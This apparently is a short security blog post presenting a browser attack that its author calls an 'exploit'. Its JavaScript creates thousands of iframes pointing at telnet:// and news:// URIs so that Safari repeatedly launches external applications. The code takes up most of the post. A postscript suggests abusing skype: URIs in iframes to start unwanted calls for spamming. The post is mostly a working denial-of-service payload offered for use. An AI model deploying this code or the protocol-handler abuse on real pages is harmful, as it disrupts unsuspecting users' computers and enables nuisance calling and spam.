Some time ago RSnake published the thing, which gets user into a real panic - iframes with mailto: URI. I just developed it furtherly. Now "exploit" creates iframes with telnet: and news: sources, and if browser doesn't properly handles protocols, which requires external applications to be launched (actually, I'm talking about Apple Safari), this gets user into a real panic :)
<body /> <script> function makeFrameTelnet() { ifrm = document.createElement("IFRAME"); ifrm.src = 'telnet://nonexistent.com:80'; document.body.appendChild(ifrm); } </script> <script> function makeFrameNews() { ifrm = document.createElement("IFRAME"); ifrm.src = 'news://nonexistent.com'; document.body.appendChild(ifrm); } </script> <script> for (i=0; i < 9999; i++) { makeFrameTelnet() makeFrameNews() } </script>
P.S. Safari and IE doesn't properly handle skype: protocol. When we create an iframe with, for example, skype:blahblahblah?call source and open it, Skype gets run and the call to blahblahblah user begins. It seems that it's possible to perform some kind of spamming using it. Need to play around with it.